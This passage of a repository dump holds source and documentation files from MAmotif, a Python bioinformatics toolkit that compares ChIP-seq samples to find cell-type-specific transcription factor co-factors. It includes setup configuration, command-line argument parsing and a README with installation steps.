\"sphinx_rtd_theme\"]\n}\n\nclassifiers = [\n \"Development Status :: 5 - Production/Stable\",\n 'Environment :: Console',\n 'Intended Audience :: Science/Research',\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: Unix\",\n \"Operating System :: POSIX\",\n \"Operating System :: MacOS\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Topic :: Scientific/Engineering :: Bio-Informatics\"\n]\n\nsetup(name=\"MAmotif\",\n version=version,\n description=description,\n long_description=long_description,\n url=\"https://github.com/shao-lab/MAmotif\",\n project_urls={\n \"Bug Tracker\": \"https://github.com/shao-lab/MAmotif/issues\",\n \"Documentation\": \"https://mamotif.readthedocs.io\",\n \"Source Code\": \"https://github.com/shao-lab/MAmotif\",\n },\n author=\"Hayden Sun\",\n author_email=\"[email protected]\",\n license='BSD',\n packages=find_packages(),\n entry_points={\"console_scripts\": [\"mamotif=mamotif.cli.main:main\"]},\n python_requires=\">=3.6\",\n install_requires=install_requires,\n extras_require=extras_require,\n classifiers=classifiers,\n zip_safe=False,\n )\n" }, { "alpha_fraction": 0.7300150990486145, "alphanum_fraction": 0.7300150990486145, "avg_line_length": 30.571428298950195, "blob_id": "3be9e14370de314cae49a4442a3d1895b9055658", "content_id": "864664decd50a36a55223c676e2cef1671a8abe0", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 663, "license_type": "permissive", "max_line_length": 69, "num_lines": 21, "path": "/mamotif/cli/intergrate.py", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "\"\"\"\nmamotif.cli.integrate\n---------------------\n\nIntegrate MAnorm and MotifScan results to run 
MAmotif.\n\"\"\"\n\nfrom manorm.logging import setup_logger as setup_manorm_logger\nfrom motifscan.logging import setup_logger as setup_motifscan_logger\n\nfrom mamotif.integration import run_integration\n\n\ndef run(args):\n    setup_manorm_logger(args.verbose)\n    setup_motifscan_logger(args.verbose)\n    run_integration(\n        f_manorm=args.f_manorm, f_motifscan=args.f_motifscan,\n        negative=args.negative, genome=args.genome, split=args.split,\n        upstream=args.upstream, downstream=args.downstream,\n        correction=args.correction, output_dir=args.output_dir)\n" }, { "alpha_fraction": 0.7276058793067932, "alphanum_fraction": 0.740227997303009, "avg_line_length": 36.75384521484375, "blob_id": "26fe50bd5a803fb1431fa6287f8bcad1939d4ef0", "content_id": "6994d95e7a5aeeda69df57ed585ed032c44e4610", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2456, "license_type": "permissive", "max_line_length": 130, "num_lines": 65, "path": "/README.rst", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "MAmotif\n=======\n\n|Documentation Status| |pypi| |license|\n\n.. |Documentation Status| image:: https://readthedocs.org/projects/mamotif/badge/?version=latest\n   :target: https://mamotif.readthedocs.io/en/latest/?badge=latest\n.. |pypi| image:: https://img.shields.io/pypi/v/mamotif.svg\n   :target: https://pypi.org/project/MAmotif/\n.. |license| image:: https://img.shields.io/pypi/l/MAmotif.svg\n   :target: https://github.com/shao-lab/MAmotif/blob/master/LICENSE\n\nIntroduction\n------------\n\n**MAmotif** is used to compare two ChIP-seq samples of the same protein from different cell types or conditions\n(e.g. Mutant vs Wild-type) and **identify transcriptional factors (TFs) associated with the cell-type biased binding**\nof this protein as its **co-factors**, by using TF binding information obtained from motif analysis\n(or from other ChIP-seq data).\n\nMAmotif automatically combines **MAnorm** model to perform quantitative comparison on given ChIP-seq samples together\nwith Motif-Scan toolkit to scan ChIP-seq peaks for **TF binding motifs**, and uses a systematic integrative analysis to\nsearch for TFs whose binding sites are significantly associated with the cell-type biased peaks between two ChIP-seq samples.\n\nWhen applying to ChIP-seq data of histone marks of regulatory elements (such as H3K4me3 for active promoters and\nH3K9/27ac for active promoter/enhancers), or DNase/ATAC-seq data, MAmotif can be used to detect **cell-type specific regulators**.\n\nWorkflow\n--------\n\n.. image:: https://github.com/shao-lab/MAmotif/blob/master/docs/source/image/MAmotif_workflow.png\n\nCitation\n--------\n\n`Sun H, Wang J, Gong Z, Yao J, Wang Y, Xu J, Yuan GC, Zhang Y, Shao Z. Quantitative integration of epigenomic variation\nand transcription factor binding using MAmotif toolkit identifies an important role of IRF2 as transcription activator\nat gene promoters. Cell discovery. 2018 Jul 10;4(1):38. <https://www.nature.com/articles/s41421-018-0045-y>`__\n\nInstallation\n------------\n\nThe latest release of MAmotif is available at `PyPI <https://pypi.org/project/MAmotif/>`__:\n\n.. code-block:: shell\n\n   $ pip install mamotif\n\nOr you can install MAmotif via conda:\n\n.. 
code-block:: shell\n\n $ conda install -c bioconda mamotif\n\n\nDocumentation\n-------------\n\nTo see the full documentation of MAmotif, please refer to: http://mamotif.readthedocs.io/en/latest/\n\nLicense\n-------\n\n`BSD 3-Clause\nLicense <https://github.com/shao-lab/MAmotif/blob/master/LICENSE>`__\n\n\n" }, { "alpha_fraction": 0.7284210324287415, "alphanum_fraction": 0.7291228175163269, "avg_line_length": 29.319149017333984, "blob_id": "9bcf26bc6bdc32ec4a1275b94a9a3c0f1a47dfd4", "content_id": "5589e30c1b4afdc7b927b41f4c99eaeacd05db33", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1425, "license_type": "permissive", "max_line_length": 124, "num_lines": 47, "path": "/docs/source/index.rst", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "MAmotif\n=======\n\n.. image:: https://readthedocs.org/projects/mamotif/badge/?version=latest\n :alt: Documentation Status\n :target: https://mamotif.readthedocs.io/en/latest/?badge=latest\n.. image:: https://img.shields.io/pypi/v/mamotif.svg\n :alt: PyPI\n :target: https://pypi.org/project/MAmotif/\n.. image:: https://img.shields.io/pypi/l/MAmotif.svg\n :alt: License\n :target: https://github.com/shao-lab/MAmotif/blob/master/LICENSE\n\n**MAmotif** is an integrative toolkit for searching cell type-specific co-factors associated with differential binding.\n\nFeatures\n--------\n\n- Quantitatively compare ChIP-Seq samples by robust linear regression on common protein binding sites(peaks) (MAnorm model)\n- Scan for motif target sites and perform motif enrichment analysis on genomic regions\n- Identify transcriptional factors (TFs) associated with the cell-type differential binding\n- Search for candidate cell-type specific regulators\n\n\nContents\n--------\n\n.. toctree::\n :maxdepth: 2\n\n intro\n tutorial\n demo\n changelog\n faq\n license\n contact\n\n---------------\n\nThe Python version of MAmotif is developed by ShaoLab_ at `CAS-MPG Partner Institute for Computational Biology, SIBS, CAS`_.\n\n.. seealso::\n GitHub repository of MAmotif: https://github.com/shao-lab/MAmotif\n\n.. _ShaoLab: http://bioinfo.sibs.ac.cn/shaolab/\n.. 
_CAS-MPG Partner Institute for Computational Biology, SIBS, CAS: https://www.picb.ac.cn/\n" }, { "alpha_fraction": 0.6357472538948059, "alphanum_fraction": 0.6457293629646301, "avg_line_length": 40, "blob_id": "13122b6511728b6d1042c6950cd3df0ea6faad00", "content_id": "c43e5af12579d78c975693d059c0f31f421f58cc", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10619, "license_type": "permissive", "max_line_length": 95, "num_lines": 259, "path": "/mamotif/cli/main.py", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "\"\"\"\nmamotif.cli.main\n----------------\n\nMain command line interface of MAmotif.\n\"\"\"\n\nimport argparse\nimport os\nfrom textwrap import dedent\n\nfrom manorm.read import READ_FORMATS\nfrom manorm.region import REGION_FORMATS\n\nfrom mamotif import __version__\nfrom mamotif.cli import intergrate, run\nfrom mamotif.logging import setup_logger\n\n\ndef _existed_file(path):\n \"\"\"Check whether a passed argument is an existed file.\"\"\"\n if not os.path.isfile(path):\n raise argparse.ArgumentTypeError(f\"file not found: {path}\")\n return path\n\n\ndef _pos_int(value):\n \"\"\"Check whether a passed argument is a positive integer.\"\"\"\n try:\n value_int = int(value)\n if value_int <= 0:\n raise ValueError\n except (ValueError, TypeError):\n raise argparse.ArgumentTypeError(\n f\"invalid positive int value: {value!r}\")\n return value_int\n\n\ndef _add_verbose_argument(parser):\n parser.add_argument(\n \"--verbose\", dest=\"verbose\", action=\"store_true\", default=False,\n help=\"Enable verbose log messages.\")\n return parser\n\n\ndef add_mamotif_arguments(parser):\n parser_integrate = parser.add_argument_group(\"Integration Options\")\n parser_integrate.add_argument(\n \"--split\", dest=\"split\", action=\"store_true\", default=False,\n help=\"Split genomic regions into promoter/distal regions and run \"\n \"separately.\")\n parser_integrate.add_argument(\n \"--upstream\", metavar=\"DISTANCE\", dest=\"upstream\",\n type=_pos_int, default=4000,\n help=\"TSS upstream distance for promoters. Default: 4000\")\n parser_integrate.add_argument(\n \"--downstream\", metavar=\"DISTANCE\", dest=\"downstream\",\n type=_pos_int, default=2000,\n help=\"TSS downstream distance for promoters. Default: 2000\")\n parser_integrate.add_argument(\n \"--correction\", dest=\"correction\", choices=[\"benjamin\", \"bonferroni\"],\n default=\"benjamin\",\n help=\"Method for multiple testing correction. Default: benjamin\")\n parser_output = parser.add_argument_group(\"Output Options\")\n parser_output.add_argument(\n \"-o\", \"--output-dir\", metavar=\"DIR\", dest=\"output_dir\", required=True,\n help=\"Directory to write output files.\")\n return parser\n\n\ndef configure_parser_run(subparsers):\n help_msg = \"Run complete workflow (MAnorm + MotifScan + Integration).\"\n desc_msg = help_msg + dedent(\"\"\"\n\n Run the complete MAmotif workflow with basic MAnorm/MotifScan options.\n If you want to control other advanced options (MAnorm normalization \n options or MotifScan scanning options), please run them independently and\n call MAmotif integration module with the `mamotif integrate` sub-command.\n \"\"\")\n epilog_msg = dedent(\"\"\"\n Notes:\n ------\n Before running MAmotif, the MotifScan genome/motif data files should be \n configured in advance. Please refer to the documentation for more \n information. 
\n \"\"\")\n parser = subparsers.add_parser(\n \"run\", description=desc_msg, help=help_msg, epilog=epilog_msg,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser_input = parser.add_argument_group(\"Input Options\")\n parser_input.add_argument(\n \"--p1\", \"--peak1\", metavar=\"FILE\", dest=\"peak_file1\", required=True,\n type=_existed_file, help=\"Peak file of sample A.\")\n parser_input.add_argument(\n \"--p2\", \"--peak2\", metavar=\"FILE\", dest=\"peak_file2\", required=True,\n type=_existed_file, help=\"Peak file of sample B.\")\n parser_input.add_argument(\n \"--pf\", \"--peak-format\", metavar=\"FORMAT\", dest=\"peak_format\",\n choices=REGION_FORMATS, default=\"bed\",\n help=f\"Format of the peak files. Support {REGION_FORMATS}. \"\n f\"Default: bed\")\n parser_input.add_argument(\n \"--r1\", \"--read1\", metavar=\"FILE\", dest=\"read_file1\", required=True,\n type=_existed_file, help=\"Read file of sample A.\")\n parser_input.add_argument(\n \"--r2\", \"--read2\", metavar=\"FILE\", dest=\"read_file2\", required=True,\n type=_existed_file, help=\"Read file of sample B.\")\n parser_input.add_argument(\n \"--rf\", \"--read-format\", metavar=\"FORMAT\", dest=\"read_format\",\n choices=READ_FORMATS, default=\"bed\",\n help=f\"Format of the read files. Support {READ_FORMATS}. Default: bed\")\n parser_input.add_argument(\n \"--n1\", \"--name1\", metavar=\"NAME\", dest=\"name1\",\n help=\"Name of sample A. If not specified, the peak file name will be \"\n \"used.\")\n parser_input.add_argument(\n \"--n2\", \"--name2\", metavar=\"NAME\", dest=\"name2\",\n help=\"Name of sample B. If not specified, the peak file name will be \"\n \"used.\")\n\n parser_input.add_argument(\n \"-m\", \"--motif\", metavar=\"NAME\", dest=\"motif\", required=True,\n help=\"Motif set name to scan for.\")\n parser_input.add_argument(\n \"-g\", \"--genome\", metavar=\"GENOME\", dest=\"genome\", required=True,\n help=\"Genome assembly name.\")\n\n parser_reads = parser.add_argument_group(\"MAnorm Options\")\n parser_reads.add_argument(\n \"--s1\", \"--shiftsize1\", metavar=\"N\", dest=\"shift_size1\",\n type=int, default=100,\n help=\"Single-end reads shift size for sample A. Reads are shifted by \"\n \"`N` bp towards 3' direction and the 5' end of each shifted read \"\n \"is used to represent the genomic locus of the DNA fragment. \"\n \"Set to 0.5 * fragment size of the ChIP-seq library. \"\n \"Default: 100\")\n parser_reads.add_argument(\n \"--s2\", \"--shiftsize2\", metavar=\"N\", dest=\"shift_size2\",\n type=int, default=100,\n help=\"Single-end reads shift size for sample B. Default: 100\")\n parser_reads.add_argument(\n \"--pe\", \"--paired-end\", dest=\"paired\", action='store_true',\n default=False,\n help=\"Paired-end mode. The middle point of each read pair is used to \"\n \"represent the genomic locus of the DNA fragment. If specified, \"\n \"`--s1` and `--s2` will be ignored.\")\n\n parser_motifscan = parser.add_argument_group(\"MotifScan Options\")\n parser_motifscan.add_argument(\n \"-p\", dest=\"p_value\", default=\"1e-4\",\n choices=[\"1e-2\", \"1e-3\", \"1e-4\", \"1e-5\", \"1e-6\"],\n help=\"P value cutoff for motif scores. 
Default: 1e-4\")\n parser_motifscan.add_argument(\n \"-t\", \"--threads\", metavar=\"N\", dest=\"n_threads\", type=int, default=1,\n help=\"Number of processes used to run in parallel.\")\n parser_mamotif = parser.add_argument_group(\"MAmotif Options\")\n parser_mamotif.add_argument(\n \"--mode\", dest=\"mode\", choices=['both', 'A', 'B'], default='both',\n help=\"Which sample to perform MAmotif on. Default: both\")\n parser = add_mamotif_arguments(parser)\n parser = _add_verbose_argument(parser)\n parser.set_defaults(func=run.run)\n\n\ndef configure_parser_integrate(subparsers):\n help_msg = \"Run the integration module with MAnorm and MotifScan results.\"\n desc_msg = help_msg + dedent(\"\"\"\n\n This command is used when users have already got the MAnorm and MotifScan \n results, and only run the final integration procedure.\n \"\"\")\n epilog_msg = dedent(\"\"\"\n Examples:\n ---------\n Suppose you have the MAnorm result (sample A vs sample B), and the \n MotifScan results for both samples:\n \n 1) Find cell type-specific co-factors for sample A:\n \n mamotif integrate -i A_MAvalues.xls -m A_motifscan/motif_sites_numbers.xls -o <path>\n \n 2) Convert M=log2(A/B) to -M=log2(B/A) and find co-factors for sample B:\n \n mamotif integrate -i B_MAvalues.xls -m B_motifscan/motif_sites_numbers.xls -n -o <path>\n \n \"\"\")\n parser = subparsers.add_parser(\n \"integrate\", description=desc_msg, help=help_msg, epilog=epilog_msg,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n parser_input = parser.add_argument_group(\"Input Options\")\n parser_input.add_argument(\n \"-i\", metavar=\"FILE\", dest=\"f_manorm\", required=True,\n help=\"MAnorm result for sample A or B (A/B_MAvalues.xls).\")\n parser_input.add_argument(\n \"-m\", metavar=\"FILE\", dest=\"f_motifscan\", required=True,\n help=\"MotifScan result for sample A or B (motif_sites_number.xls).\")\n parser_input.add_argument(\n \"-n\", \"--negative\", dest=\"negative\", action=\"store_true\",\n default=False,\n help=\"Convert M=log2(A/B) to -M=log2(B/A). Required when finding \"\n \"co-factors for sample B.\")\n parser_input.add_argument(\n \"-g\", dest=\"genome\", default=None,\n help=\"Genome name. Required if `--split` is enabled.\")\n parser = add_mamotif_arguments(parser)\n parser = _add_verbose_argument(parser)\n parser.set_defaults(func=intergrate.run)\n\n\ndef configure_parser_main():\n \"\"\"Configure the arguments parsers for MAmotif.\"\"\"\n description = dedent(\"\"\"\n MAmotif: An integrative toolkit for detecting cell type-specific regulators\n \n MAmotif is used to compare two ChIP-seq samples of the same protein from \n different cell types (or conditions, e.g. wild-type vs mutant) and \n identify transcriptional factors (TFs) associated with the cell type-biased \n binding of this protein as its co-factors, by using TF binding information \n obtained from motif analysis.\n \n Citation:\n Sun, H., Wang, J., Gong, Z. et al. Quantitative integration of epigenomic\n variation and transcription factor binding using MAmotif toolkit identifies\n an important role of IRF2 as transcription activator at gene promoters.\n Cell Discov 4, 38 (2018). 
https://doi.org/10.1038/s41421-018-0045-y\n \"\"\")\n\n epilog_msg = dedent(\"\"\"\n Please run `mamotif COMMAND -h` to see the subcommand options.\n\n See also:\n Documentation: https://mamotif.readthedocs.io\n Source code: https://github.com/shao-lab/MAmotif\n Bug reports: https://github.com/shao-lab/MAmotif/issues\n \"\"\")\n\n parser = argparse.ArgumentParser(\n description=description, epilog=epilog_msg,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(\"-v\", \"--version\", action=\"version\",\n version=f\"MAmotif {__version__}\")\n\n subparsers = parser.add_subparsers(title=\"MAmotif Subcommands\",\n metavar=\"command\", dest=\"cmd\")\n configure_parser_run(subparsers)\n configure_parser_integrate(subparsers)\n return parser\n\n\ndef main():\n parser = configure_parser_main()\n args = parser.parse_args()\n setup_logger(args.verbose)\n args.func(args)\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.7689429521560669, "alphanum_fraction": 0.7754911184310913, "avg_line_length": 49.904762268066406, "blob_id": "2b24417478bf92aae1ccec6099230badef72b664", "content_id": "ac15d57f362dfeea38a8a4c9b0698cedbac34812", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1069, "license_type": "permissive", "max_line_length": 130, "num_lines": 21, "path": "/docs/source/intro.rst", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": ".. _intro:\n\nIntroduction\n------------\n\n**MAmotif** is used to compare two ChIP-seq samples of the same protein from different cell types or conditions\n(e.g. Mutant vs Wild-type) and **identify transcriptional factors (TFs) associated with the cell-type biased binding**\nof this protein as its **co-factors**, by using TF binding information obtained from motif analysis\n(or from other ChIP-seq data).\n\nMAmotif automatically combines **MAnorm** model to perform quantitative comparison on given ChIP-seq samples together\nwith Motif-Scan toolkit to scan ChIP-seq peaks for **TF binding motifs**, and uses a systematic integrative analysis to\nsearch for TFs whose binding sites are significantly associated with the cell-type biased peaks between two ChIP-seq samples.\n\nWhen applying to ChIP-seq data of histone marks of regulatory elements (such as H3K4me3 for active promoters and\nH3K9/27ac for active promoter/enhancers), or DNase/ATAC-seq data, MAmotif can be used to detect **cell-type specific regulators**.\n\nWorkflow\n--------\n\n.. image:: image/MAmotif_workflow.png\n" } ]
16
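To make the multiple-testing step in `mamotif/stats.py` above concrete, here is a minimal usage sketch of the `adjust_p_values` helper; the input p-values are invented, and it assumes the MAmotif package is installed so that `mamotif.stats` is importable:

    # Usage sketch for adjust_p_values() from mamotif/stats.py above.
    # The p-values below are made-up illustration data.
    from mamotif.stats import adjust_p_values

    p_values = [0.001, 0.02, 0.04, 0.30]

    # Benjamini-Hochberg ('benjamin'): each p-value is scaled by n / rank
    # and capped at 1, where rank is its position in ascending order.
    print(adjust_p_values(p_values, correction='benjamin'))
    # -> [0.004, 0.04, 0.0533..., 0.3]

    # Bonferroni: each p-value is scaled by n and capped at 1.
    print(adjust_p_values(p_values, correction='bonferroni'))
    # -> [0.004, 0.08, 0.16, 1]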
AdamMagoon/FlaskBrowserGUI
https://github.com/AdamMagoon/FlaskBrowserGUI
c9cbca3100482672ddf32a2309fa67a1c7826330
308d150fe620a792978d202adb9072e40dac56e3
d29c263b3e9f22bd98b384bf5fe49df37c96f6f9
refs/heads/master
2021-01-13T00:44:43.049983
2015-12-20T00:52:39
2015-12-20T00:52:39
48,258,038
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6196708679199219, "alphanum_fraction": 0.622521698474884, "avg_line_length": 27.371322631835938, "blob_id": "503ba828c2e1305546909bc7aab29ee5f880a935", "content_id": "bc35f7c621f0a9438d28183d1162a8779db19db1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7717, "license_type": "no_license", "max_line_length": 104, "num_lines": 272, "path": "/main.py", "repo_name": "AdamMagoon/FlaskBrowserGUI", "src_encoding": "UTF-8", "text": "import hashlib as h\nimport sqlalchemy\nfrom os import getenv\nfrom socket import gethostname\nfrom werkzeug.utils import redirect\nfrom wtforms import Form, validators, StringField, HiddenField, SubmitField\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, create_engine, ForeignKey\nfrom sqlalchemy.orm import sessionmaker, relationship, backref\nfrom flask import Flask, render_template, request, flash, url_for\n\napp = Flask(__name__)\n\nengine = create_engine('sqlite:///local_db.sqlite', echo=False)\nBase = declarative_base()\n\n\nclass User(Base):\n \"\"\"\n Session and data storage for users\n \"\"\"\n __tablename__ = 'users'\n\n id = Column(Integer, primary_key=True)\n hostname = Column(String)\n u_name = Column(String)\n\n files = relationship('File', backref='users')\n directories = relationship('Directory', backref='users')\n\n def __repr__(self):\n return \"<User(hostname={}, u_name={}, files={})>\".format(self.hostname, self.u_name, self.files)\n\n\nclass File(Base):\n \"\"\"\n Child table for Users.\n\n Stores file information such as:\n - File check_sums\n - File paths\n \"\"\"\n __tablename__ = 'files'\n\n id = Column(Integer, primary_key=True)\n file_path = Column(String)\n check_sum = Column(String)\n\n user_id = Column(Integer, ForeignKey('users.id'))\n\n def __repr__(self):\n return \"<File(file_path={})>\".format(self.file_path)\n\n\nclass Directory(Base):\n __tablename__ = 'dirs'\n\n id = Column(Integer, primary_key=True)\n dir_path = Column(String)\n\n user_id = Column(Integer, ForeignKey('users.id'))\n\n def __repr__(self):\n return \"<Directory(dir_path={}, files={})>\".format(self.dir_path, self.files)\n\n\n# Initialize SQL Tables and make connection to database\nBase.metadata.create_all(engine)\n# Session is the database communicator\nSession = sessionmaker(bind=engine)\nsession = Session()\n\n\nclass AddFile(Form):\n new_file = StringField('New File', [validators.DataRequired()])\n\n\nclass DeleteFile(Form):\n # del_file = SubmitField('Delete')\n del_file = HiddenField('del_value')\n\n\nclass HandleFile(Form):\n del_value = HiddenField('del_value')\n clicked = HiddenField('clicked')\n path = HiddenField('path')\n new_checksum = HiddenField('new_checksum')\n\n\ndef hash_it(file_path):\n # start_time = perf_counter()\n hasher = h.md5() # Type of hash we are using\n block_size = 65536\n\n with open(file_path, 'rb') as f: # 'rb' read the file_path at at a byte level\n buf = f.read(block_size) # Buffer size\n while len(buf) > 0:\n hasher.update(buf)\n buf = f.read(block_size)\n\n package = hasher.hexdigest()\n # end_time = perf_counter()\n return package\n\n\ndef check_sum_all(files):\n check_sum_results = []\n file_filter = [x.file_path for x in files]\n for file in file_filter:\n chk_sum = hash_it(file)[0]\n db_check = session.query(File).filter(File.check_sum == chk_sum).first()\n\n payload = (file, chk_sum, db_check)\n check_sum_results.append(payload)\n\n # Shoot off bits of data via AJAX ???\n #\n #\n 
#\n\n return check_sum_results\n\n\ndef add_file_object(user, path, check_sum):\n from os.path import dirname\n if path == dirname(path):\n from os import listdir\n\n for file in listdir(path):\n check_sum = hash_it(file)\n file_object = File(file_path=file, check_sum=check_sum)\n\n # new_object = get_directory_object()\n\n else:\n new_object = File(file_path=path, check_sum=check_sum)\n\n user.files.append(new_object)\n session.add(user)\n session.commit()\n\n\ndef delete_file(user, file):\n check_sum = session.query(File.check_sum).filter(File.file_path == file)\n f = File(file_path=file, check_sum=check_sum)\n\n\ndef get_stored_files(user):\n try:\n stored = session.query(user.files).all()\n except sqlalchemy.exc.InvalidRequestError as e:\n print(\"ERROR InvalidRequestError: {}\".format(e))\n stored = []\n return stored\n\n\ndef get_user_session():\n # User data acquired by os.getenv() and socket.gethostname()\n user_name = getenv('username') # Client username ['amagoon']\n hostname = gethostname() # Client hostname ['dsa-LT4']\n\n # DB session initialization\n\n # User query\n user_q = session.query(User).filter(User.u_name == user_name).first()\n if not user_q:\n new_user = User(u_name=user_name, hostname=hostname)\n session.add(new_user)\n session.commit()\n user_q = session.query(User).filter(User.u_name == user_name).first()\n\n return user_q\n\n\ndef get_local_ip():\n import socket as s\n con = s.socket(s.AF_INET, s.SOCK_DGRAM)\n con.connect(('8.8.8.8', 0))\n local_ip = con.getsockname()[0]\n return local_ip\n\n\[email protected]('/handle_form', methods=['POST'])\ndef handle_form():\n def query_form(var_name):\n return request.form.getlist(var_name)\n\n clicked = query_form('clicked')[0]\n del_val = query_form('del_value')[0]\n\n new_checksum = query_form('new_checksum')[0]\n\n if clicked == 'delete':\n session.query(File).filter(File.check_sum == del_val).delete()\n session.commit()\n\n elif clicked == 'open':\n from os import system\n from os.path import dirname\n path = query_form('path')[0]\n folder = dirname(path)\n system('explorer {}'.format(folder))\n\n elif clicked == 'update':\n print(\"Update - new_checksum: {}\\nOld checksum: {}\".format(new_checksum, del_val))\n session.query(File).filter(File.check_sum == del_val).update({\"check_sum\": new_checksum})\n session.commit()\n\n return redirect(url_for('view'))\n\n\[email protected]('/delete', methods=['POST'])\ndef delete_entry(): # Testing\n print(\"yesssirrr\")\n if request.method == 'POST':\n user = get_user_session()\n form = request.form.getlist('del_value')\n new_test_val = request.form.getlist('delete')\n print(\"new_test_value = {}\\nType: {}\".format(new_test_val, type(new_test_val)))\n del_file = form[0] # hash value of file\n\n s = session.query(File).filter(File.check_sum == del_file).delete()\n print(\"Session query for hash value = {}\\nType: {}\".format(s, type(s)))\n return redirect(url_for('view'))\n\n\[email protected]('/add_file_object', methods=['GET', 'POST'])\ndef add_entry():\n import os\n form = AddFile(request.form)\n new_file = form.new_file._value().replace(\"\\\"\", '') # File path\n is_file = os.path.isfile(new_file)\n is_dir = os.path.dirname(new_file) == new_file\n\n if form.validate():\n\n if is_file:\n user = get_user_session()\n hash_val = hash_it(new_file)\n add_file_object(user, new_file, hash_val)\n\n elif is_dir:\n pass\n\n return redirect(url_for('view'))\n else:\n flash(\"File doesn't exist. 
Check your file path.\")\n return redirect(url_for('view'))\n\n\[email protected]('/', methods=['GET', 'POST'])\ndef view():\n payload = [] # Return values | list of tuples\n local_ip = get_local_ip()\n\n # Here's our user\n user = get_user_session()\n\n for file in user.files:\n fp = file.file_path\n current_check_sum = hash_it(fp) # Function that goes to hash the file right now\n file_data = (file, current_check_sum)\n payload.append(file_data)\n\n return render_template('check_sums.html', form=AddFile(), check_sum_results=payload,\n u_name=user.u_name, h_name=user.hostname, ip_address=local_ip)\n\n\nif __name__ == '__main__':\n app.secret_key = 'super secret key'\n app.config['SESSION_TYPE'] = 'filesystem'\n app.run(port=80, debug=True)\n" }, { "alpha_fraction": 0.5287356376647949, "alphanum_fraction": 0.7126436829566956, "avg_line_length": 16.600000381469727, "blob_id": "4eb6a7abd5fe97f0ff749038fdba58d76dc2b9ea", "content_id": "20c93633298051fb94fc263392e5170939d51910", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 87, "license_type": "no_license", "max_line_length": 21, "num_lines": 5, "path": "/requirements.txt", "repo_name": "AdamMagoon/FlaskBrowserGUI", "src_encoding": "UTF-8", "text": "Flask>=0.10.1\nFlask-Login>=0.3.2\nbackports.pbkdf2>=0.1\nwtforms>=2.0.2\nsqlalchemy>=1.0.9" }, { "alpha_fraction": 0.7291666865348816, "alphanum_fraction": 0.75, "avg_line_length": 27.899999618530273, "blob_id": "d278d0e8053c3ed10e4682508d70b916cca31e68", "content_id": "0f28257fd14151a25b57ff4b8a25a8a94bc0d1a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 288, "license_type": "no_license", "max_line_length": 105, "num_lines": 10, "path": "/README.txt", "repo_name": "AdamMagoon/FlaskBrowserGUI", "src_encoding": "UTF-8", "text": "This is using a Flask layout from a previous project. However, the main functionality is on the homepage:\n\nhttp://localhost/\nor\nhttp://127.0.0.1/\n\nTo use:\n- run main.py\n- point your browser to either of the above locations (http://localhost/)\n- Add Files using the obviously marked input." } ]
3
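The block-wise MD5 pattern used by `hash_it()` in `main.py` above is worth seeing in isolation; the sketch below is a standalone rewrite of that idea, and the file passed at the end is just an example file that exists in this project:

    # Standalone sketch of the chunked-hash pattern from hash_it() above:
    # reading 64 KiB blocks keeps memory use flat even for very large files.
    import hashlib

    def md5_of_file(path, block_size=65536):
        hasher = hashlib.md5()
        with open(path, 'rb') as f:
            # iter() keeps calling f.read(block_size) until it returns b'' (EOF)
            for chunk in iter(lambda: f.read(block_size), b''):
                hasher.update(chunk)
        return hasher.hexdigest()

    # Example: recompute a tracked file's checksum to detect changes.
    print(md5_of_file('local_db.sqlite'))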
prp-e/ocr_translator
https://github.com/prp-e/ocr_translator
f3f685e4da7c70680366a9dd0e1d883cd79b2e01
afcc1862b952ddf64aa04361af85e14c36b97822
20236475d6554645ccdb491a4daf6362d40fb1ab
refs/heads/main
2023-04-18T01:48:12.749261
2021-05-13T21:54:22
2021-05-13T21:54:22
366,425,307
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6345698237419128, "alphanum_fraction": 0.637726902961731, "avg_line_length": 23.86274528503418, "blob_id": "c4c5b4cb4580521cff7fc31a7d87dd300543705d", "content_id": "b4c2b60f32ef3aa26f671fd57aad3bb2852bff1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1267, "license_type": "no_license", "max_line_length": 106, "num_lines": 51, "path": "/server_old.py", "repo_name": "prp-e/ocr_translator", "src_encoding": "UTF-8", "text": "\"\"\" This code checks for macOS, if you have SSL problem with any other OS's, please add it to the code \"\"\"\nimport sys\n\nif sys.platform == 'darwin':\n import requests \n\n requests.packages.urllib3.disable_warnings() \n\n import ssl \n\n try:\n\n _create_unverified_https_context = ssl._create_unverified_context \n\n except AttributeError: \n\n pass \n\n else: \n ssl._create_default_https_context = _create_unverified_https_context\n\n\"\"\" Main code \"\"\" \nimport cv2 \nfrom flask import Flask, request\nimport easyocr \nimport numpy as np \n\nreader = easyocr.Reader(['en'], gpu=False)\n\napp = Flask(__name__)\n\[email protected]('/', methods=['POST'])\ndef magic():\n json_input = request.get_json()\n image = np.array(json_input['image'])\n cv2.imwrite('output.jpg', image)\n input_image = cv2.imread('output.jpg')\n image_data = reader.readtext(input_image)\n \n output_array = []\n for datum 